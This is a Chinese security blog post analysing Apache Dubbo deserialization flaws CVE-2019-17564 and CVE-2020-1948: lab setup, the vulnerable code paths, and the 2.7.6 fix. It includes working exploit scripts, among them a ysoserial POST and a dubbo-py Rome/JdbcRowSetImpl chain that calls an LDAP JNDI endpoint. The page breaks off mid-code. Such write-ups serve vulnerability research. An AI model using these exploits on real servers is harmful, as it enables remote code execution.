

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/css/images/bg/favicon.ico">
  <link rel="icon" href="/css/images/bg/favicon.ico">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Aluvion">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言 最近看到的 Dubbo 反序列化漏洞，以前没有见过这个框架，现在顺便总结一下最近的几个反序列化洞。">
<meta property="og:type" content="article">
<meta property="og:title" content="Dubbo反序列化漏洞">
<meta property="og:url" content="http://yoursite.com/2020/07/09/Dubbo%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Twings">
<meta property="og:description" content="前言 最近看到的 Dubbo 反序列化漏洞，以前没有见过这个框架，现在顺便总结一下最近的几个反序列化洞。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-07-09T14:40:30.000Z">
<meta property="article:modified_time" content="2022-04-15T13:43:38.268Z">
<meta property="article:author" content="Aluvion">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Dubbo">
<meta property="article:tag" content="Hessian">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Dubbo反序列化漏洞 - Twings</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Twings&#39; Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/css/images/bg/bg5.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Dubbo反序列化漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2020-07-09 22:40" pubdate>
          2020年7月9日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          17 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Dubbo反序列化漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p> 最近看到的 Dubbo 反序列化漏洞，以前没有见过这个框架，现在顺便总结一下最近的几个反序列化洞。</p>
<span id="more"></span>

<hr>
<h3 id="Dubbo"><a href="#Dubbo" class="headerlink" title="Dubbo"></a>Dubbo</h3><p>Dubbo 是一个分布式服务框架远程调用框架，类似 Java 的 RMI 远程方法调用，需要进行跨 JVM 的远程网络通信，所以就要用到序列化和反序列化。而 Dubbo 中有多种序列化方式，有的序列化方式在反序列化收到的数据的时候，就容易受到反序列化攻击。</p>
<h3 id="CVE-2019-17564"><a href="#CVE-2019-17564" class="headerlink" title="CVE-2019-17564"></a>CVE-2019-17564</h3><h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>在 <a href="https://github.com/apache/dubbo-samples">GitHub</a> 上面拖一个 demo，然后 IDEA 打开使用 HTTP 协议的 dubbo-samples-http 文件夹，修改一下 pom.xml 里面的 Dubbo 版本，再加入一个可以利用的 Gadget：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dubbo.version</span>&gt;</span>2.7.3<span class="hljs-tag">&lt;/<span class="hljs-name">dubbo.version</span>&gt;</span><br>...<br><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>3.2.1<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>再修改一下 http-provider.xml 里面的 zookeeper 地址，这里我将 zookeeper 开在虚拟机的 docker 里面，所以这里是虚拟机地址：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dubbo:registry</span> <span class="hljs-attr">address</span>=<span class="hljs-string">&quot;zookeeper://$&#123;zookeeper.address:192.168.111.128&#125;:2181&quot;</span>/&gt;</span><br></code></pre></td></tr></table></figure>

<p>然后在虚拟机开一个 zookeeper 容器：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">docker pull zookeeper<br>docker run -id --name zookeeper -p 2181:2181 zookeeper<br></code></pre></td></tr></table></figure>

<p>然后 Dubbo 的 HttpProvider 就可以开起来了。</p>
<h4 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h4><p>根据漏洞描述：</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">Unsafe deserialization occurs within a Dubbo application which has HTTPremoting enabled. An attacker may submit a POST request with a Java object init to completely compromise a Provider<span class="hljs-built_in"> instance </span>of Apache Dubbo,<span class="hljs-built_in"> if </span>thisinstance enables HTTP.<br></code></pre></td></tr></table></figure>

<p>简单发一个 POST 请求，可以看到错误的调用栈：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs stylus">java<span class="hljs-selector-class">.io</span><span class="hljs-selector-class">.StreamCorruptedException</span>: invalid stream <span class="hljs-selector-tag">header</span>: <span class="hljs-number">64617461</span><br>java<span class="hljs-selector-class">.io</span><span class="hljs-selector-class">.ObjectInputStream</span><span class="hljs-selector-class">.readStreamHeader</span>(ObjectInputStream<span class="hljs-selector-class">.java</span>:<span class="hljs-number">899</span>)<br>java<span class="hljs-selector-class">.io</span><span class="hljs-selector-class">.ObjectInputStream</span>.&lt;init&gt;(ObjectInputStream<span class="hljs-selector-class">.java</span>:<span class="hljs-number">357</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.core</span><span class="hljs-selector-class">.ConfigurableObjectInputStream</span>.&lt;init&gt;(ConfigurableObjectInputStream<span class="hljs-selector-class">.java</span>:<span class="hljs-number">63</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.rmi</span><span class="hljs-selector-class">.CodebaseAwareObjectInputStream</span>.&lt;init&gt;(CodebaseAwareObjectInputStream<span class="hljs-selector-class">.java</span>:<span class="hljs-number">97</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.rmi</span><span class="hljs-selector-class">.RemoteInvocationSerializingExporter</span><span class="hljs-selector-class">.createObjectInputStream</span>(RemoteInvocationSerializingExporter<span class="hljs-selector-class">.java</span>:<span class="hljs-number">125</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.httpinvoker</span><span class="hljs-selector-class">.HttpInvokerServiceExporter</span><span class="hljs-selector-class">.readRemoteInvocation</span>(HttpInvokerServiceExporter<span class="hljs-selector-class">.java</span>:<span class="hljs-number">119</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.httpinvoker</span><span class="hljs-selector-class">.HttpInvokerServiceExporter</span><span class="hljs-selector-class">.readRemoteInvocation</span>(HttpInvokerServiceExporter<span class="hljs-selector-class">.java</span>:<span class="hljs-number">100</span>)<br>org<span class="hljs-selector-class">.springframework</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.httpinvoker</span><span class="hljs-selector-class">.HttpInvokerServiceExporter</span><span class="hljs-selector-class">.handleRequest</span>(HttpInvokerServiceExporter<span class="hljs-selector-class">.java</span>:<span class="hljs-number">79</span>)<br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.dubbo</span><span class="hljs-selector-class">.rpc</span><span class="hljs-selector-class">.protocol</span><span class="hljs-selector-class">.http</span>.HttpProtocol<span class="hljs-variable">$InternalHandler</span><span class="hljs-selector-class">.handle</span>(HttpProtocol<span class="hljs-selector-class">.java</span>:<span class="hljs-number">216</span>)<br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.dubbo</span><span class="hljs-selector-class">.remoting</span><span class="hljs-selector-class">.http</span><span class="hljs-selector-class">.servlet</span><span class="hljs-selector-class">.DispatcherServlet</span><span class="hljs-selector-class">.service</span>(DispatcherServlet<span class="hljs-selector-class">.java</span>:<span class="hljs-number">61</span>)<br>javax<span class="hljs-selector-class">.servlet</span><span class="hljs-selector-class">.http</span><span class="hljs-selector-class">.HttpServlet</span><span class="hljs-selector-class">.service</span>(HttpServlet<span class="hljs-selector-class">.java</span>:<span class="hljs-number">790</span>)<br></code></pre></td></tr></table></figure>

<p>因为输入的不是 Java 序列化字节码，所以会因为无法反序列化而报错，追踪调用栈，我们定位到 HttpInvokerServiceExporter 类的 readRemoteInvocation 方法：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> RemoteInvocation <span class="hljs-title function_">readRemoteInvocation</span><span class="hljs-params">(HttpServletRequest request, InputStream is)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br><br>    <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">ois</span> <span class="hljs-operator">=</span> createObjectInputStream(decorateInputStream(request, is));<br>    <span class="hljs-keyword">try</span> &#123;<br>    	<span class="hljs-keyword">return</span> doReadRemoteInvocation(ois);<br>    &#125;<br>    <span class="hljs-keyword">finally</span> &#123;<br>    	ois.close();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到从输入中创建一个 ObjectInputStream 对象，然后在 doReadRemoteInvocation 方法中：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> RemoteInvocation <span class="hljs-title function_">doReadRemoteInvocation</span><span class="hljs-params">(ObjectInputStream ois)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br><br>    <span class="hljs-type">Object</span> <span class="hljs-variable">obj</span> <span class="hljs-operator">=</span> ois.readObject();<br>    <span class="hljs-keyword">if</span> (!(obj <span class="hljs-keyword">instanceof</span> RemoteInvocation)) &#123;<br>        <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">RemoteException</span>(<span class="hljs-string">&quot;Deserialized object needs to be assignable to type [&quot;</span> +<br>        	RemoteInvocation.class.getName() + <span class="hljs-string">&quot;]: &quot;</span> + ClassUtils.getDescriptiveType(obj));<br>    &#125;<br>    <span class="hljs-keyword">return</span> (RemoteInvocation) obj;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>进行了反序列化。</p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>很简单，POST 一个 ysoserial 生成的 payload 就好了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding:utf8 -*-</span><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> base64<br><br>url = <span class="hljs-string">&quot; http://127.0.0.1:8080/org.apache.dubbo.samples.http.api.DemoService&quot;</span><br>data = base64.b64decode(<span class="hljs-string">&quot;rO...Hg=&quot;</span>)<br>requests.post(url, data=data)<br></code></pre></td></tr></table></figure>

<h3 id="CVE-2020-1948"><a href="#CVE-2020-1948" class="headerlink" title="CVE-2020-1948"></a>CVE-2020-1948</h3><h4 id="环境搭建-1"><a href="#环境搭建-1" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>在 <a href="https://github.com/apache/dubbo-spring-boot-project">GItHub</a> 上面拖一个 Dubbo 2.7.6 版本的 demo，然后用 IDEA 打开 dubbo-spring-boot-samples 文件夹，运行 DubboAutoConfigurationProviderBootstrap 类，就可以把环境开起来了。</p>
<p>然后给这个项目里的 pom.xml，即 dubbo-spring-boot-samples\auto-configure-samples\provider-sample\pom.xml 加上 rome 依赖：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>com.rometools<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>rome<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>1.7.0<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br></code></pre></td></tr></table></figure>

<h4 id="漏洞原理-1"><a href="#漏洞原理-1" class="headerlink" title="漏洞原理"></a>漏洞原理</h4><p>这个漏洞有两个触发点，第一个没什么好说的，就是普通的 Hessian 反序列化攻击（就是 Dubbo 默认使用的序列化方式），Dubbo 会反序列化传输来的方法参数：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java">args = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[pts.length];<br><span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i &lt; args.length; i++) &#123;<br>    <span class="hljs-keyword">try</span> &#123;<br>    	args[i] = in.readObject(pts[i]);<br>    &#125; <span class="hljs-keyword">catch</span> (Exception e) &#123;<br>        <span class="hljs-keyword">if</span> (log.isWarnEnabled()) &#123;<br>        	log.warn(<span class="hljs-string">&quot;Decode argument failed: &quot;</span> + e.getMessage(), e);<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>另一个触发点比较有意思，利用的是打印错误信息触发的 toString，Dubbo 在找不到注册的 service 就会打印错误信息：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java">DubboExporter&lt;?&gt; exporter = (DubboExporter&lt;?&gt;) exporterMap.get(serviceKey);<br><br><span class="hljs-keyword">if</span> (exporter == <span class="hljs-literal">null</span>) &#123;<br>	<span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">RemotingException</span>(channel, <span class="hljs-string">&quot;Not found exported service: &quot;</span> + serviceKey + <span class="hljs-string">&quot; in &quot;</span> + exporterMap.keySet() + <span class="hljs-string">&quot;, may be version or group mismatch &quot;</span> + <span class="hljs-string">&quot;, channel: consumer: &quot;</span> + channel.getRemoteAddress() + <span class="hljs-string">&quot; --&gt; provider: &quot;</span> + channel.getLocalAddress() + <span class="hljs-string">&quot;, message:&quot;</span> + inv);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里的 inv 就是 DecodeableRpcInvocation 类型的对象，里面存放了远程方法调用需要的数据，比如反序列化后的 arguments，这里会隐式调用它的 toString 方法，也就是它的父类 RpcInvocation 的 toString 方法：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-meta">@Override</span><br><span class="hljs-keyword">public</span> String <span class="hljs-title function_">toString</span><span class="hljs-params">()</span> &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;RpcInvocation [methodName=&quot;</span> + methodName + <span class="hljs-string">&quot;, parameterTypes=&quot;</span><br>        + Arrays.toString(parameterTypes) + <span class="hljs-string">&quot;, arguments=&quot;</span> + Arrays.toString(arguments)<br>        + <span class="hljs-string">&quot;, attachments=&quot;</span> + attachments + <span class="hljs-string">&quot;]&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>也就是说会调用 arguments 对象的 toString，就可以作为反序列化链的入口，比如接上 Rome 依赖中的 toStringBean 触发 JNDI 注入。</p>
<p>顺带一提的是，在高一点版本的 Dubbo（2.7.6）中，这个入口点已经被修复了，打印错误的代码变成了：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java">DubboExporter&lt;?&gt; exporter = (DubboExporter&lt;?&gt;) exporterMap.get(serviceKey);<br><br><span class="hljs-keyword">if</span> (exporter == <span class="hljs-literal">null</span>) &#123;<br>    <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">RemotingException</span>(channel, <span class="hljs-string">&quot;Not found exported service: &quot;</span> + serviceKey + <span class="hljs-string">&quot; in &quot;</span> + exporterMap.keySet() + <span class="hljs-string">&quot;, may be version or group mismatch &quot;</span> + <span class="hljs-string">&quot;, channel: consumer: &quot;</span> + channel.getRemoteAddress() + <span class="hljs-string">&quot; --&gt; provider: &quot;</span> + channel.getLocalAddress() + <span class="hljs-string">&quot;, message:&quot;</span> + getInvocationWithoutData(inv));<br>&#125;<br></code></pre></td></tr></table></figure>

<p>没有直接调用 inv 的 toString 方法，而是调用 getInvocationWithoutData 方法来获取数据：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> Invocation <span class="hljs-title function_">getInvocationWithoutData</span><span class="hljs-params">(Invocation invocation)</span> &#123;<br>    <span class="hljs-keyword">if</span> (logger.isDebugEnabled()) &#123;<br>    	<span class="hljs-keyword">return</span> invocation;<br>    &#125;<br>    <span class="hljs-keyword">if</span> (invocation <span class="hljs-keyword">instanceof</span> RpcInvocation) &#123;<br>        <span class="hljs-type">RpcInvocation</span> <span class="hljs-variable">rpcInvocation</span> <span class="hljs-operator">=</span> (RpcInvocation) invocation;<br>        rpcInvocation.setArguments(<span class="hljs-literal">null</span>);<br>        <span class="hljs-keyword">return</span> rpcInvocation;<br>    &#125;<br>    <span class="hljs-keyword">return</span> invocation;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>把 arguments 置空了，这个入口点也就无法使用了，除非配置了 debug 模式。</p>
<h4 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>第二种利用方式可以直接使用 python 的 dubbo-py 库，参考 ruilin 师傅给出的 exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding:utf8 -*-</span><br><span class="hljs-keyword">from</span> dubbo.codec.hessian2 <span class="hljs-keyword">import</span> new_object<br><span class="hljs-keyword">from</span> dubbo.client <span class="hljs-keyword">import</span> DubboClient<br><br>client = DubboClient(<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>, <span class="hljs-number">12345</span>)<br><br>JdbcRowSetImpl = new_object(<br>      <span class="hljs-string">&#x27;com.sun.rowset.JdbcRowSetImpl&#x27;</span>,<br>      dataSource=<span class="hljs-string">&quot;ldap://127.0.0.1:1389/Exploit&quot;</span>,<br>      strMatchColumns=[<span class="hljs-string">&quot;foo&quot;</span>]<br>)<br>JdbcRowSetImplClass = new_object(<br>      <span class="hljs-string">&#x27;java.lang.Class&#x27;</span>,<br>      name=<span class="hljs-string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span>,<br>)<br>toStringBean = new_object(<br>      <span class="hljs-string">&#x27;com.rometools.rome.feed.impl.ToStringBean&#x27;</span>,<br>      beanClass=JdbcRowSetImplClass,<br>      obj=JdbcRowSetImpl<br>)<br><br>resp = client.send_request_and_return_response(<br>    service_name=<span class="hljs-string">&#x27;cn.rui0&#x27;</span>,<br>    method_name=<span class="hljs-string">&#x27;rce&#x27;</span>,<br>    service_version=<span class="hljs-string">&quot;1.0.0&quot;</span>,<br>    args=[toStringBean]<br>)<br></code></pre></td></tr></table></figure>

<p>第一种的利用就比较麻烦了，因为 Rome 的 HashMap 类型要用 dubbo-py 来构造比较复杂，利用方式跟 Java RMI 客户端攻击服务端相似，不过不需要在意服务函数的参数类型，因为它的函数调用是在反序列化完成之后进行的。</p>
<p>所以利用的时候可以像参考文章里面那样，通过 wireshark 抓包改包来完成，也可以自己改一改它的接口（将方法参数类型改为 Object）和消费者类：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-meta">@EnableAutoConfiguration</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title 